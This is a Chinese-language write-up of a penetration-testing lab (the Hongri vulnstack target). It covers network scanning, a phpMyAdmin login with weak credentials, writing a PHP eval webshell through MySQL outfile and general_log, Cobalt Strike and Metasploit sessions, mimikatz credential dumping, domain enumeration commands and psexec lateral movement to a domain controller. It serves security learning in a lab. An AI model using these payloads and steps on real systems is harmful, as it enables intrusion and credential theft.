标签:tcp src get 添加 学习 ISE bin account 路径
这个是红日的一个靶机,http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
并未按照介绍里的点一个一个走,简单记录下过程。
环境搭建:设置Win2K3 仅主机模式;winserver08 仅主机模式;win7添加一个网卡,一个设为仅主机模式,另一个设为NAT模式;攻击机设为NAT模式。
登录win7,可能要修改密码。然后进入C:\phpStudy\文件下运行phpstudy.exe
攻击机IP:192.168.157.137
nmap 192.168.157.0/24 -n -sP -sn
发现win7的IP为 192.168.157.138 ,探测开启的服务
nmap 192.168.157.138 -O -sS -sV -v
访问http://192.168.157.138/发现是一个PHP探针,能看到绝对路径
对目录进行爆破
dirb http://192.168.157.138/
发现了http://192.168.157.138/phpmyadmin/index.php
发现弱密码root/root进入后台
先查看能否自定义导出文件目录的权限,结果为NULL意味着不允许导入导出数据到目录。且只能在my.ini进行配置。
SHOW VARIABLES LIKE "secure_file_priv";
如果能将my.inisecure_file_prive并将其值设置为""或"/",并重启MySQL服务
select ‘<?php @eval($_POST[pass]);?>‘ into outfile ‘c:/phpstudy/www/shell.php‘;
进行一句话写shell
2. 利用日志写shell
查看全局变量 general_log、general_log_file
SHOW VARIABLES LIKE "general_log%";
general_log 默认关闭,,general_log_file为日志储存路径。
写shell的思路:更改general_log的值,将日志储存在能访问的路径下,且后缀名为php。然后通过log日志进行写入一句话木马,然后再进一步利用。
set global general_log = "ON"; set global general_log_file = "C:/phpStudy/WWW/shell.php";
然后在日志中插入一句话
SELECT ‘<?php eval($_POST["pass"]);?>‘
用蚁剑连接http://192.168.157.138/shell.php
利用蚁剑虚拟端进行信息搜集,发现在执行net view一些命令时无回显,利用CS生成木马,回连beacon。因为是靶机调整心跳为1s。
记录常用的信息搜集命令,cs运行shell命令时需加 "shell 命令",eg: "shell net view"
ipconfig /all net view net view /domain net time /domain 能够执行,说明此台机器在域中 (若是此命令在显示域处显示 WORKGROUP,则不存在域,若是报错:发生系统错误 5,则存在域,但该用户不是域用户) net config workstation 查询当前的登录域与用户信息 net lookup “域名” nslookup 命令直接解析域名服务器 net user /domain 查看当前域的所有用户 wmic useraccount get /all 获取域内用户的详细信息 net group "domain computers" /domain 查看所有域成员计算机列表 net group "domain admins" /domain 查看所有域控管理人员 net group "domain controllers" /domain 查看与控制管理器 net group "enterprise admins" /domain 查看企业管理组 net localgroup administrators /domain 查看域控,升级为域控时,本地账户也成为域管 net accounts /domain 获取域密码信息 nltest /domain_trusts 获取域信任列表
通过信息搜集知道了域控IP、域控管理员、域内其他计算机。然后利用svc-exe进行提权
利用mimikatz抓取密码导出凭证
此时执行net view已经发现域控和另一台机器,利用导出的凭证能直接登录。
CS派生session给msf
现在msf监听,通讯类型要与cs保持一致
msf:
cs:
kali上面执行,连接session解释派生出来的会话
sessions sessions -i 1
因为知道域控和另一台机器再192.168.52.0/24段
添加路由:
尝试了MS17-010、MS08-067未果。到这只是记录下cs结合msf的运用,同理msf也可以派生session给cs。前面导出的凭证登录域内两台机器
创建一个bind_tcp的listener 针对目标机器点击psexec
但是在OWA用凭证登录的时候,发现不能连接上,怀疑被拦了。这里使用beacon SMB listener
SMB Beacon 使用命名管道通过父级 Beacon 进行通讯,当两个 Beacons 链接后,子 Beacon 从父 Beacon 获取到任务并发送。因为链接的 Beacons 使用 Windows 命名管道进行通信,此流量封装在 SMB 协议中,所以 SMB Beacon 相对隐蔽,绕防火墙时可能发挥奇效。
再次创建一个SMB listener ,从已有的beacon上面spwn,选择创建的listener
然后再登陆凭证,OWA上线。
标签:tcp src get 添加 学习 ISE bin account 路径
原文地址:https://www.cnblogs.com/yuuki-aptx/p/13343037.html